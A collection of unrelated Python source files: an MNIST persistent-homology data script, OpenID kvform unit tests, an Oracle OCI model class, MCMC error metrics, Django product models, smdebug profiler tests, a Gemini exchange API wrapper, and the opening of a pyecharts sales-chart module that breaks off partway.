parser.add_argument('--max_life', '-Ml', default=5, type=int, help='max life')
parser.add_argument('--min_life','-ml', type=float, default=0, help="minimum lifetime to be counted")
parser.add_argument('--ph', default="life", choices=["life","hist"], help="persistence encoding scheme")
parser.add_argument('--plot', '-p', action='store_true',help="just plot")
parser.add_argument('--save_test', '-t', action='store_true',help="create test dataset in addition to training dataset")
parser.add_argument('--verbose', '-v', action='store_true')
args = parser.parse_args()
np.random.seed(0)
n = args.train_sample
if args.dim == 2:
dim_str = ""
if args.size == 0:
args.size = 28
else:
dim_str = "3d"
if args.size == 0:
args.size = 16
x_filename = ["rmnist{}{}_s{}_train_{}.npz".format(dim_str,n,args.size,args.ph),
"mnist{}_s{}_test_{}.npz".format(dim_str,args.size,args.ph)]
if args.plot:
k=4
if args.save_test:
dat = np.load(x_filename[1])
else:
dat = np.load(x_filename[0])
print(dat['y'][:k])
if args.dim==2:
plot_mnist(dat['x'][:k])
else:
plot_mnist(dat['x'][:k,:3,:,:,dat['x'].shape[-1]//2])
exit()
tx,ty,vx,vy = make_rmnist(n,size=args.size,dim=args.dim,save_test=args.save_test)
if args.dim==2:
mx,my = tx[0].shape
mz = 1
bd = [0,args.size-1]
else:
mx,my,mz = tx[0].shape
bd = [0,15]
if args.save_test:
datasets = [tx, vx]
datasets_y = [ty, vy]
else:
datasets = [tx]
datasets_y = [ty]
for k,data in enumerate(datasets):
vec = []
i = 1
# PH image
for img in data:
bw_img = (img >= threshold_otsu(img))
dt_img = distance_transform_edt(bw_img)-distance_transform_edt(~bw_img)
ph = cripser.computePH(dt_img.astype(np.float64))
if args.ph=="life":
v=lifeVect(ph,mx,my,mz,max_life=args.max_life)/args.max_life
else:
v=histVect(ph,mx,my,mz,min_life=args.min_life,max_life=args.max_life,
n_life_bins=3,n_birth_bins=3,dims=[0,1])
if args.dim == 2: ## remove boundary
v[:,bd,:]=0
v[:,:,bd]=0
else:
v[:,bd,:,:]=0
v[:,:,bd,:]=0
v[:,:,:,bd]=0
vec.append(np.concatenate([np.expand_dims(img, 0),v],axis=0))
#print(v[v!=0])
#print(img.shape,v.shape)
if i%200 == 0:
print("{} / {}".format(i,len(data)))
i += 1
vec = np.array(vec, dtype=np.float32)
print("output shape:",vec.shape)
np.savez_compressed(x_filename[k], x=vec, y=datasets_y[k])
|
import unittest
from testfixtures import LogCapture
from openid import kvform
class KVDictTest(unittest.TestCase):
def runTest(self):
for kv_data, result, expected_warnings in kvdict_cases:
# Convert KVForm to dict
with LogCapture() as logbook:
d = kvform.kvToDict(kv_data)
# make sure it parses to expected dict
self.assertEqual(d, result)
# Check to make sure we got the expected number of warnings
self.assertEqual(len(logbook.records), expected_warnings)
# Convert back to KVForm and round-trip back to dict to make
# sure that *** dict -> kv -> dict is identity. ***
kv = kvform.dictToKV(d)
d2 = kvform.kvToDict(kv)
self.assertEqual(d, d2)
class KVSeqTest(unittest.TestCase):
def cleanSeq(self, seq):
"""Create a new sequence by stripping whitespace from start
and end of each value of each pair"""
clean = []
for k, v in seq:
if isinstance(k, str):
k = k.decode('utf8')
if isinstance(v, str):
v = v.decode('utf8')
clean.append((k.strip(), v.strip()))
return clean
def runTest(self):
for kv_data, result, expected_warnings in kvseq_cases:
# seq serializes to expected kvform
with LogCapture() as logbook:
actual = kvform.seqToKV(kv_data)
self.assertEqual(actual, result)
self.assertIsInstance(actual, str)
# Parse back to sequence. Expected to be unchanged, except
# stripping whitespace from start and end of values
# (i. e. ordering, case, and internal whitespace is preserved)
seq = kvform.kvToSeq(actual)
clean_seq = self.cleanSeq(seq)
self.assertEqual(seq, clean_seq)
self.assertEqual(len(logbook.records), expected_warnings,
"Invalid warnings for {}: {}".format(kv_data, [r.getMessage() for r in logbook.records]))
kvdict_cases = [
# (kvform, parsed dictionary, expected warnings)
('', {}, 0),
('college:harvey mudd\n', {'college': '<NAME>'}, 0),
('city:claremont\nstate:CA\n', {'city': 'claremont', 'state': 'CA'}, 0),
('is_valid:true\ninvalidate_handle:{HMAC-SHA1:2398410938412093}\n',
{'is_valid': 'true', 'invalidate_handle': '{HMAC-SHA1:2398410938412093}'}, 0),
# Warnings from lines with no colon:
('x\n', {}, 1),
('x\nx\n', {}, 2),
('East is least\n', {}, 1),
# But not from blank lines (because LJ generates them)
('x\n\n', {}, 1),
# Warning from empty key
(':\n', {'': ''}, 1),
(':missing key\n', {'': 'missing key'}, 1),
# Warnings from leading or trailing whitespace in key or value
(' street:foothill blvd\n', {'street': 'foothill blvd'}, 1),
('major: computer science\n', {'major': 'computer science'}, 1),
(' dorm : east \n', {'dorm': 'east'}, 2),
# Warnings from missing trailing newline
('e^(i*pi)+1:0', {'e^(i*pi)+1': '0'}, 1),
('east:west\nnorth:south', {'east': 'west', 'north': 'south'}, 1),
]
kvseq_cases = [
([], '', 0),
# Make sure that we handle non-ascii characters (also wider than 8 bits)
([(u'\u03bbx', u'x')], '\xce\xbbx:x\n', 0),
# If it's a UTF-8 str, make sure that it's equivalent to the same
# string, decoded.
([('\xce\xbbx', 'x')], '\xce\xbbx:x\n', 0),
([('openid', 'useful'), ('a', 'b')], 'openid:useful\na:b\n', 0),
# Warnings about leading whitespace
([(' openid', 'useful'), ('a', 'b')], ' openid:useful\na:b\n', 1),
# Warnings about leading and trailing whitespace
([(' openid ', ' useful '),
(' a ', ' b ')], ' openid : useful \n a : b \n', 4),
# warnings about leading and trailing whitespace, but not about
# internal whitespace.
([(' open id ', ' use ful '),
(' a ', ' b ')], ' open id : use ful \n a : b \n', 4),
([(u'foo', 'bar')], 'foo:bar\n', 0),
]
kvexc_cases = [
[('openid', 'use\nful')],
[('open\nid', 'useful')],
[('open\nid', 'use\nful')],
[('open:id', 'useful')],
[('foo', 'bar'), ('ba\n d', 'seed')],
[('foo', 'bar'), ('bad:', 'seed')],
]
class KVExcTest(unittest.TestCase):
def runTest(self):
for kv_data in kvexc_cases:
self.assertRaises(ValueError, kvform.seqToKV, kv_data)
class GeneralTest(unittest.TestCase):
kvform = '<None>'
def test_convert(self):
with LogCapture() as logbook:
result = kvform.seqToKV([(1, 1)])
self.assertEqual(result, '1:1\n')
self.assertEqual(len(logbook.records), 2)
|
<gh_stars>0
# coding: utf-8
# Copyright (c) 2016, 2022, Oracle and/or its affiliates. All rights reserved.
# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class FacetedSearchDateFilterRequest(object):
"""
Object with date filter criteria
"""
def __init__(self, **kwargs):
"""
Initializes a new FacetedSearchDateFilterRequest object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param field_name:
The value to assign to the field_name property of this FacetedSearchDateFilterRequest.
:type field_name: str
:param time_after:
The value to assign to the time_after property of this FacetedSearchDateFilterRequest.
:type time_after: datetime
:param time_before:
The value to assign to the time_before property of this FacetedSearchDateFilterRequest.
:type time_before: datetime
"""
self.swagger_types = {
'field_name': 'str',
'time_after': 'datetime',
'time_before': 'datetime'
}
self.attribute_map = {
'field_name': 'fieldName',
'time_after': 'timeAfter',
'time_before': 'timeBefore'
}
self._field_name = None
self._time_after = None
self._time_before = None
@property
def field_name(self):
"""
Gets the field_name of this FacetedSearchDateFilterRequest.
Date field name that needs to be filtered by.
:return: The field_name of this FacetedSearchDateFilterRequest.
:rtype: str
"""
return self._field_name
@field_name.setter
def field_name(self, field_name):
"""
Sets the field_name of this FacetedSearchDateFilterRequest.
Date field name that needs to be filtered by.
:param field_name: The field_name of this FacetedSearchDateFilterRequest.
:type: str
"""
self._field_name = field_name
@property
def time_after(self):
"""
Gets the time_after of this FacetedSearchDateFilterRequest.
The date and time the request was created, as described in
`RFC 3339`__, section 14.29.
__ https://tools.ietf.org/rfc/rfc3339
:return: The time_after of this FacetedSearchDateFilterRequest.
:rtype: datetime
"""
return self._time_after
@time_after.setter
def time_after(self, time_after):
"""
Sets the time_after of this FacetedSearchDateFilterRequest.
The date and time the request was created, as described in
`RFC 3339`__, section 14.29.
__ https://tools.ietf.org/rfc/rfc3339
:param time_after: The time_after of this FacetedSearchDateFilterRequest.
:type: datetime
"""
self._time_after = time_after
@property
def time_before(self):
"""
Gets the time_before of this FacetedSearchDateFilterRequest.
The date and time the request was created, as described in
`RFC 3339`__, section 14.29.
__ https://tools.ietf.org/rfc/rfc3339
:return: The time_before of this FacetedSearchDateFilterRequest.
:rtype: datetime
"""
return self._time_before
@time_before.setter
def time_before(self, time_before):
"""
Sets the time_before of this FacetedSearchDateFilterRequest.
The date and time the request was created, as described in
`RFC 3339`__, section 14.29.
__ https://tools.ietf.org/rfc/rfc3339
:param time_before: The time_before of this FacetedSearchDateFilterRequest.
:type: datetime
"""
self._time_before = time_before
def __repr__(self):
return formatted_flat_dict(self)
def __eq__(self, other):
if other is None:
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
|
<filename>phase4_analysis/metrics.py
# <NAME> (<EMAIL>)
import numpy as np
import scipy.stats as ss
#from diagnostics import MIN_ESS
MIN_ESS_PER_CHAIN = 1.0 # TODO limit dupes
def stack_first(X):
assert(X.ndim == 3)
# Equivalent to:
# Y = np.concatenate([X[ii, :, :] for ii in xrange(X.shape[0])], axis=0)
Y = np.reshape(X, (-1, X.shape[2]))
return Y
def interleave(X):
assert(X.ndim == 3)
# Equivalent to:
# np.concatenate([X[:, ii, :] for ii in xrange(X.shape[1])], axis=0)
Y = stack_first(X.transpose((1, 0, 2)))
return Y
def mean(chain):
assert(np.ndim(chain) == 2)
return np.mean(chain, axis=0)
def var(chain):
assert(np.ndim(chain) == 2)
# var ddof=1 => unbiased
return np.var(chain, axis=0, ddof=1)
def ks(exact, chain):
assert(np.ndim(exact) == 2)
D = exact.shape[1]
assert(np.ndim(chain) == 2 and chain.shape[1] == D)
ks_stat = np.array([ss.ks_2samp(exact[:, ii], chain[:, ii])[0]
for ii in xrange(D)])
return ks_stat
MOMENT_METRICS = {'mean': mean, 'var': var}
OTHER_METRICS = {'ks': ks}
# Defined as expected loss for N(0,1) * n_samples
METRICS_REF = {'mean': 1.0, 'var': 2.0, 'ks': 0.822}
def rectified_sq_error(exact, approx, clip):
err = np.minimum(clip, (exact - approx) ** 2)
return err
def eval_inc(exact_chain, all_chains, metric, all_idx):
n_grid, n_chains = all_idx.shape
assert(n_chains >= 1)
assert(len(all_chains) == n_chains)
D = all_chains[0].shape[1]
if metric in MOMENT_METRICS:
estimator = MOMENT_METRICS[metric]
exact = estimator(exact_chain)
moment_metric = True
else:
assert(metric in OTHER_METRICS)
estimator = OTHER_METRICS[metric]
moment_metric = False
clip = METRICS_REF[metric] / MIN_ESS_PER_CHAIN
err = np.zeros((n_grid, n_chains))
for c_num, chain in enumerate(all_chains):
assert(chain.ndim == 2 and chain.shape[1] == D)
# Just do it naively right now instead of online & incremental
for ii, n_samples in enumerate(all_idx[:, c_num]):
if moment_metric:
approx = estimator(chain[:n_samples, :])
err[ii, c_num] = np.mean(rectified_sq_error(exact, approx, clip))
else:
approx = estimator(exact_chain, chain[:n_samples, :])
err[ii, c_num] = np.mean(rectified_sq_error(0.0, approx, clip))
err = np.mean(err, axis=1) # ave over chains
assert(err.shape == (n_grid,))
return err
def eval_total(exact_chain, all_chains, metric):
n_chains = len(all_chains)
assert(n_chains >= 1)
D = exact_chain.shape[1]
assert(exact_chain.ndim == 2)
if metric in MOMENT_METRICS:
estimator = MOMENT_METRICS[metric]
exact = estimator(exact_chain)
moment_metric = True
else:
assert(metric in OTHER_METRICS)
estimator = OTHER_METRICS[metric]
moment_metric = False
clip = METRICS_REF[metric] / MIN_ESS_PER_CHAIN
err = np.zeros((D, n_chains))
for c_num, chain in enumerate(all_chains):
assert(chain.ndim == 2 and chain.shape[1] == D)
if moment_metric:
approx = estimator(chain)
err[:, c_num] = rectified_sq_error(exact, approx, clip)
else:
approx = estimator(exact_chain, chain)
err[:, c_num] = rectified_sq_error(0.0, approx, clip)
err = np.mean(err, axis=1) # ave over chains
assert(err.shape == (D,))
return err
def eval_pooled(exact_chain, all_chains, metric):
n_chains = len(all_chains)
assert(n_chains >= 1)
D = exact_chain.shape[1]
assert(exact_chain.ndim == 2)
if metric in MOMENT_METRICS:
estimator = MOMENT_METRICS[metric]
exact = estimator(exact_chain)
moment_metric = True
else:
assert(metric in OTHER_METRICS)
estimator = OTHER_METRICS[metric]
moment_metric = False
clip = METRICS_REF[metric] / (MIN_ESS_PER_CHAIN * n_chains)
all_chains = stack_first(np.asarray(all_chains))
if moment_metric:
approx = estimator(all_chains)
err = rectified_sq_error(exact, approx, clip)
else:
approx = estimator(exact_chain, all_chains)
err = rectified_sq_error(0.0, approx, clip)
assert(err.shape == (D,))
return err
|
from django.conf import settings
from django.contrib.auth import get_user_model
from django.db import models
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from PIL import Image
import io
User = get_user_model()
"""Images of products to use online"""
class ProductFigure(models.Model):
image = models.ImageField(_('Product Figure'), upload_to='figures/%Y/%m/%d/')
public = models.BooleanField(_('Avaliable to All'), default=False)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
on_delete=models.SET_NULL)
def resize_figure(self, size=(256, 256)):
try:
image = Image.open(self.image.path)
image.thumbnail(size, Image.ANTIALIAS)
image.save(self.image.path)
except IOError:
print("Cannot resize", self.image.name)
# AFTER saving, resive the image and overwrite
def save(self, *args, **kwargs):
super().save(*args,**kwargs)
self.resize_figure()
def __str__(self):
return self.image.name
def get_absolute_url(self):
return reverse('edit_figure', args=[self.pk])
def is_owner(self, user):
return self.owner == user
"""Categories for products"""
class ProductCategory(models.Model):
title = models.CharField(_('Title'), max_length=64)
description = models.TextField(_('Description'))
public = models.BooleanField(_('Avaliable to All'), default=False)
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
on_delete=models.SET_NULL)
category_figure = models.ForeignKey(ProductFigure, blank=True, null=True,
on_delete=models.SET_NULL)
class Meta:
unique_together = ("title", "owner")
verbose_name = "Product Category"
verbose_name_plural = "Product Categories"
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('edit_category', args=[self.pk])
def is_owner(self, user):
return self.owner == user
"""The actual product"""
class Product(models.Model):
title = models.CharField(_('Title'), max_length=64)
description = models.TextField(_('Description'))
product_category = models.ForeignKey(ProductCategory, null=True,
on_delete=models.SET_NULL, related_name='category')
product_figure = models.ForeignKey(ProductFigure, blank=True, null=True,
on_delete=models.SET_NULL, related_name='figure')
owner = models.ForeignKey(settings.AUTH_USER_MODEL, blank=True, null=True,
on_delete=models.SET_NULL, related_name='owner')
class Meta:
unique_together = ("title", "owner")
verbose_name = "Product"
verbose_name_plural = "Products"
def __str__(self):
return self.title
def save(self,*args,**kwargs):
created = not self.pk
super().save(*args,**kwargs)
if created:
ProductImage.objects.create(product=self)
def get_absolute_url(self):
return reverse('detailed_product', args=[self.pk])
def is_owner(self, user):
return self.owner == user
"""Images required for products"""
class ProductImage(models.Model):
product = models.ForeignKey(Product, on_delete=models.CASCADE)
required = models.BooleanField(_('Required'), default=True)
rotatable = models.BooleanField(_('Avaliable in Landscape and Portrait Format'), default=True)
ratio = models.DecimalField(_('Ratio x/y'), max_digits=4, default=1.333,
decimal_places=3)
min_megapixels = models.DecimalField(_('Minimum Mega Pixels'), default=0.5,
max_digits=4, decimal_places=1)
warn_megapixels = models.DecimalField(_('Warning Mega Pixels'), default=2.1,
max_digits=4, decimal_places=1)
def get_absolute_url(self):
return reverse('edit_print', args=[self.pk])
|
# First Party
# Third Party
import pytest
from smdebug.profiler.analysis.utils.pandas_data_analysis import (
PandasFrameAnalysis,
Resource,
StatsBy,
)
from smdebug.profiler.analysis.utils.profiler_data_to_pandas import PandasFrame
@pytest.mark.parametrize("framework", ["tf2", "pt"])
def test_pandas_frames(framework):
bucket_name = (
"s3://smdebug-testing/resources/" + framework + "_detailed_profile/profiler-output"
)
pf = PandasFrame(bucket_name, scan_interval=50000000000)
system_metrics_df = pf.get_all_system_metrics()
print(f"Number of rows in system metrics dataframe = {system_metrics_df.shape[0]}")
if framework == "tf2":
assert system_metrics_df.shape[0] == 39392
if framework == "pt":
assert system_metrics_df.shape[0] == 84768
print(f"Number of columns in system metrics dataframe = {system_metrics_df.shape[1]}")
if framework == "tf2":
assert system_metrics_df.shape[1] == 7
if framework == "pt":
assert system_metrics_df.shape[1] == 7
pf = PandasFrame(bucket_name, scan_interval=50000000000)
framework_metrics_df = pf.get_all_framework_metrics()
print(f"Number of rows in framework metrics dataframe = {framework_metrics_df.shape[0]}")
if framework == "tf2":
assert framework_metrics_df.shape[0] == 73984
if framework == "pt":
assert framework_metrics_df.shape[0] == 154192
print(f"Number of columns in framework metrics dataframe = {framework_metrics_df.shape[1]}")
if framework == "tf2":
assert framework_metrics_df.shape[1] == 11
if framework == "pt":
assert framework_metrics_df.shape[1] == 11
@pytest.mark.parametrize("framework", ["tf2", "pt"])
def test_get_data_by_time(framework):
bucket_name = (
"s3://smdebug-testing/resources/" + framework + "_detailed_profile/profiler-output"
)
pf = PandasFrame(bucket_name, scan_interval=50000000000)
if framework == "tf2":
system_metrics_df, framework_metrics_df = pf.get_profiler_data_by_time(
1596668220000000, 1596678220000000
)
assert system_metrics_df.shape[0] == 39392
if framework == "pt":
system_metrics_df, framework_metrics_df = pf.get_profiler_data_by_time(
1596493560000000, 1596499560000000
)
assert system_metrics_df.shape[0] == 84768
print(f"Number of rows in system metrics dataframe = {system_metrics_df.shape[0]}")
print(f"Number of columns in system metrics dataframe = {system_metrics_df.shape[1]}")
assert system_metrics_df.shape[1] == 7
print(f"Number of rows in framework metrics dataframe = {framework_metrics_df.shape[0]}")
if framework == "tf2":
assert framework_metrics_df.shape[0] == 73984
if framework == "pt":
assert framework_metrics_df.shape[0] == 154192
print(f"Number of columns in framework metrics dataframe = {framework_metrics_df.shape[1]}")
assert framework_metrics_df.shape[1] == 11
@pytest.mark.parametrize("framework", ["tf2", "pt"])
def test_get_data_by_step(framework):
bucket_name = (
"s3://smdebug-testing/resources/" + framework + "_detailed_profile/profiler-output"
)
pf = PandasFrame(bucket_name)
_, framework_metrics_df = pf.get_profiler_data_by_step(2, 3)
assert not framework_metrics_df.empty
assert framework_metrics_df.groupby("step").ngroups == 2
print(f"Number of rows in framework metrics dataframe = {framework_metrics_df.shape[0]}")
if framework == "tf2":
assert framework_metrics_df.shape[0] == 5
if framework == "pt":
assert framework_metrics_df.shape[0] == 738
print(f"Number of columns in framework metrics dataframe = {framework_metrics_df.shape[1]}")
assert framework_metrics_df.shape[1] == 11
def get_metrics(framework):
bucket_name = (
"s3://smdebug-testing/resources/" + framework + "_detailed_profile/profiler-output"
)
pf = PandasFrame(bucket_name, use_in_memory_cache=True)
system_metrics_df, framework_metrics_df = (
pf.get_all_system_metrics(),
pf.get_all_framework_metrics(),
)
return system_metrics_df, framework_metrics_df
@pytest.fixture(scope="module", autouse=True)
def tf_pandas_frame_analysis():
return PandasFrameAnalysis(*get_metrics("tf2"))
@pytest.fixture(scope="module", autouse=True)
def pt_pandas_frame_analysis():
return PandasFrameAnalysis(*get_metrics("pt"))
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize(
"by", [StatsBy.TRAINING_PHASE, StatsBy.FRAMEWORK_METRICS, StatsBy.PROCESS, "step"]
)
def test_get_step_stats(framework, by, tf_pandas_frame_analysis, pt_pandas_frame_analysis):
if framework == "tf2":
pf_analysis = tf_pandas_frame_analysis
else:
pf_analysis = pt_pandas_frame_analysis
step_stats = pf_analysis.get_step_statistics(by=by)
if by == "step":
assert step_stats is None
else:
assert not step_stats.empty
assert step_stats.shape[1] == 7
if by == "training_phase":
if framework == "tf2":
assert step_stats.shape[0] == 2
else:
assert step_stats.shape[0] == 1
elif by == "framework_metric":
if framework == "tf2":
assert step_stats.shape[0] == 111
else:
assert step_stats.shape[0] == 207
elif by == "process":
if framework == "tf2":
assert step_stats.shape[0] == 6
else:
assert step_stats.shape[0] == 7
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize("phase", [["Step:ModeKeys.TRAIN"], None])
def test_get_util_stats_by_training_phase(
framework, phase, tf_pandas_frame_analysis, pt_pandas_frame_analysis
):
if framework == "tf2":
pf_analysis = tf_pandas_frame_analysis
else:
if phase and phase[0] == "Step:ModeKeys.TRAIN":
phase = ["Step:ModeKeys.GLOBAL"]
pf_analysis = pt_pandas_frame_analysis
util_stats = pf_analysis.get_utilization_stats(phase=phase, by=StatsBy.TRAINING_PHASE)
assert not util_stats.empty
if phase is None:
assert util_stats.shape[0] <= 8
else:
assert util_stats.shape[0] <= 8
assert util_stats.shape[1] == 9
assert all(util_stats["Resource"].unique() == ["cpu", "gpu"])
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize("resource", [None, Resource.CPU, [Resource.CPU, Resource.GPU], "cpu"])
@pytest.mark.parametrize("by", [None, "step"])
def test_get_util_stats(
framework, resource, by, tf_pandas_frame_analysis, pt_pandas_frame_analysis
):
if framework == "tf2":
pf_analysis = tf_pandas_frame_analysis
else:
pf_analysis = pt_pandas_frame_analysis
util_stats = pf_analysis.get_utilization_stats(resource=resource, by=by)
if by == "step" or resource == "cpu":
assert util_stats is None
else:
assert not util_stats.empty
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize("device", ["cpu", Resource.CPU, Resource.GPU])
@pytest.mark.parametrize(
"ranges", [None, [(0, 10), (10, 20), (30, 80), (80, 100)], [(30,)], [], ((0, 10), (10, 90))]
)
def test_get_device_usage_stats(
framework, device, ranges, tf_pandas_frame_analysis, pt_pandas_frame_analysis
):
if framework == "tf2":
pf_analysis = tf_pandas_frame_analysis
else:
pf_analysis = pt_pandas_frame_analysis
usage_stats = pf_analysis.get_device_usage_stats(device=device, utilization_ranges=ranges)
if ranges in [[(30,)], [], ((0, 10), (10, 90))] or device == "cpu":
assert usage_stats.empty
else:
assert not usage_stats.empty
if ranges is None:
assert usage_stats.shape[1] <= 3 + 3
else:
assert usage_stats.shape[1] <= 3 + len(ranges)
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2", "pt"])
@pytest.mark.parametrize(
"phase",
[
["Step:ModeKeys.TRAIN"],
"Step:ModeKeys.TRAIN",
["Step:ModeKeys.GLOBAL"],
("Step:ModeKeys.GLOBAL"),
],
)
def test_get_training_phase_intervals(
framework, phase, tf_pandas_frame_analysis, pt_pandas_frame_analysis
):
if framework == "tf2":
valid_phase = ["Step:ModeKeys.TRAIN"]
pf_analysis = tf_pandas_frame_analysis
else:
valid_phase = ["Step:ModeKeys.GLOBAL"]
pf_analysis = pt_pandas_frame_analysis
interval_stats = pf_analysis.get_training_phase_intervals(phase=phase)
if isinstance(phase, str):
phase = [phase]
if not isinstance(phase, list) or phase != valid_phase:
print(not isinstance(phase, (str, list)))
print(phase != valid_phase, phase, valid_phase)
print((isinstance(phase, str) and [phase] != valid_phase))
assert interval_stats is None
else:
assert not interval_stats.empty
assert interval_stats.shape[1] == 3
if framework == "tf2":
assert interval_stats.shape[0] == 11251
else:
assert interval_stats.shape[0] == 785
@pytest.mark.slow
@pytest.mark.parametrize("framework", ["tf2"])
def test_get_jobs_stats(framework, tf_pandas_frame_analysis, pt_pandas_frame_analysis):
if framework == "tf2":
pf_analysis = tf_pandas_frame_analysis
else:
pf_analysis = pt_pandas_frame_analysis
job_stats = pf_analysis.get_job_statistics()
assert job_stats is not None
|
<reponame>hayden4r4/Gemini-API-Wrapper-Python
import requests
import json
import base64
import hmac
import hashlib
import datetime
import time
class gemini_kit:
def __init__(self, gemini_api_key: str, gemini_api_secret: str, account: str = None, sandbox: bool = False):
self.gemini_api_key = gemini_api_key
self.gemini_api_secret = gemini_api_secret.encode()
self.account = account
if sandbox:
self.base_url = "https://api.sandbox.gemini.com"
else:
self.base_url = "https://api.gemini.com"
def place_order(self, symbol: str, amount: str, price: str, side: str, order_type: str = "exchange limit", options: list = None, stop_price: str = None) -> dict:
"""
symbol: 'btcusd', 'ethusd', etc...
side: "buy", "sell"
order_type: "exchange limit", "exchange stop limit"
options (optional) list: "maker-or-cancel", "immediate-or-cancel", "fill-or-kill", "auction-only", "indication-of-interest"
stop_price (optional)
"""
self.endpoint = "/v1/order/new"
self.url = self.base_url + self.endpoint
self.payload_nonce = str(
int(time.mktime(datetime.datetime.now().timetuple()) * 1000))
self.payload = {
"request": self.endpoint,
"nonce": self.payload_nonce,
"symbol": symbol,
"amount": amount,
"price": price,
"side": side,
"type": order_type
}
if options:
self.payload["options"] = options
if stop_price:
self.payload["stop_price"] = stop_price
if self.account:
self.payload["account"] = self.account
self.response = self.__send_payload()
return self.response
def cancel_order(self, order_id: str, all: bool or str = False) -> dict:
"""
all (optional): True, False, 'session'
Cancels orders, if all=True it will cancel all open orders,
if all='session' it will cancel all orders from session
"""
if all == True:
self.endpoint = '/v1/order/cancel/all'
elif type(all) == str:
if all.lower() == 'session':
self.endpoint = '/v1/order/cancel/session'
else:
raise ValueError(
f"Invalid argument {all} for all, must be: bool or 'session'")
else:
self.endpoint = "/v1/order/cancel"
self.url = self.base_url + self.endpoint
self.payload_nonce = str(
int(time.mktime(datetime.datetime.now().timetuple()) * 1000))
self.payload = {
"nonce": self.payload_nonce,
"order_id": order_id,
"request": self.endpoint
}
if self.account:
self.payload['account'] = self.account
self.response = self.__send_payload()
return self.response
def order_status(self, order_id: str = None, include_trades: bool = True, client_order_id: str = None) -> dict:
"""
Gets status of orders
"""
self.endpoint = "/v1/order/status"
self.url = self.base_url + self.endpoint
self.payload_nonce = str(
int(time.mktime(datetime.datetime.now().timetuple()) * 1000))
if order_id:
self.order_id = order_id
elif client_order_id:
self.order_id = client_order_id
else:
raise ValueError('Must supply either order_id or client_order_id')
self.payload = {
"nonce": self.payload_nonce,
"order_id": self.order_id,
"request": self.endpoint
}
if self.account:
self.payload['account'] = self.account
self.response = self.__send_payload()
return self.response
def get_active_orders(self) -> list:
"""
Gets status of all active orders
"""
self.endpoint = "/v1/orders"
self.url = self.base_url + self.endpoint
self.payload_nonce = str(
int(time.mktime(datetime.datetime.now().timetuple()) * 1000))
self.payload = {
"nonce": self.payload_nonce,
"request": self.endpoint
}
if self.account:
self.payload['account'] = self.account
self.response = self.__send_payload()
return self.response
def get_past_trades(self, symbol: str) -> list:
"""
symbol: 'btcusd', 'ethusd', etc...
Gets past trades for given symbol
"""
self.endpoint = "/v1/mytrades"
self.url = self.base_url + self.endpoint
self.payload_nonce = str(
int(time.mktime(datetime.datetime.now().timetuple()) * 1000))
self.payload = {
"nonce": self.payload_nonce,
"request": self.endpoint,
"symbol": symbol
}
if self.account:
self.payload['account'] = self.account
self.response = self.__send_payload()
return self.response
def get_balances(self) -> list:
"""
Gets current balances
"""
self.endpoint = "/v1/balances"
self.url = self.base_url + self.endpoint
self.payload_nonce = str(
int(time.mktime(datetime.datetime.now().timetuple()) * 1000))
self.payload = {
"nonce": self.payload_nonce,
"request": self.endpoint
}
if self.account:
self.payload['account'] = self.account
self.response = self.__send_payload()
return self.response
def get_notional_balances(self, currency: str = 'USD') -> list:
"""
Gets current balances
"""
self.currency = currency.lower()
self.endpoint = f"/v1/notionalbalances/{self.currency}"
self.url = self.base_url + self.endpoint
self.payload_nonce = str(
int(time.mktime(datetime.datetime.now().timetuple()) * 1000))
self.payload = {
"nonce": self.payload_nonce,
"request": self.endpoint
}
if self.account:
self.payload['account'] = self.account
self.response = self.__send_payload()
return self.response
def get_accounts_in_master_group(self):
"""
Get all accounts in master group
"""
self.endpoint = "/v1/account/list"
self.url = self.base_url + self.endpoint
self.payload_nonce = str(
int(time.mktime(datetime.datetime.now().timetuple()) * 1000))
self.payload = {
"nonce": self.payload_nonce,
"request": self.endpoint
}
self.response = self.__send_payload()
return self.response
def __send_payload(self) -> dict:
self.encoded_payload = json.dumps(self.payload).encode()
self.b64 = base64.b64encode(self.encoded_payload)
self.signature = hmac.new(
self.gemini_api_secret, self.b64, hashlib.sha384).hexdigest()
self.request_headers = {'Content-Type': "text/plain",
'Content-Length': "0",
'X-GEMINI-APIKEY': self.gemini_api_key,
'X-GEMINI-PAYLOAD': self.b64,
'X-GEMINI-SIGNATURE': self.signature,
'Cache-Control': "no-cache"}
self.response = requests.post(self.url,
data=None,
headers=self.request_headers)
self.response = self.response.json()
return self.response
|
import pandas as pd
import sqlite3
from pyecharts import options as opts
from pyecharts.charts import Timeline, Grid, Bar, Map, Pie, Line
from pyecharts.globals import WarningType
from pyecharts.globals import ThemeType
from pyecharts.commons.utils import JsCode
from typing import List
import math
import platform
import subprocess
import numpy as np
import os
class HospitalSalesCalculation:
bu_name = ''
database_path = '../data/_DB/'
update_file_path = '../data/_Update/'
sys_path = os.path.abspath('..')
chart_path = sys_path + "/data/_Charter/"
def __init__(self, bu_input):
self.__class__.bu_name = bu_input
pass
def read_china_sales_data(self):
database_full_name = self.__class__.database_path + self.__class__.bu_name + '_Hospital_Sales.db'
data_file_name = self.__class__.bu_name + '_Hospital_Sales'
conn = sqlite3.connect(database_full_name)
# get month list
sql_cmd = 'SELECT DISTINCT(Month) FROM ' + data_file_name
month_list = [item[0] for item in pd.read_sql(con=conn, sql=sql_cmd).values.tolist()]
# read province and monthly sales data from database
sql_cmd = 'SELECT Month, Province, round(sum(Sales_Value)/1000000, 1) as Sales_Value FROM ' + data_file_name + \
' GROUP BY Province, Month ORDER BY Month'
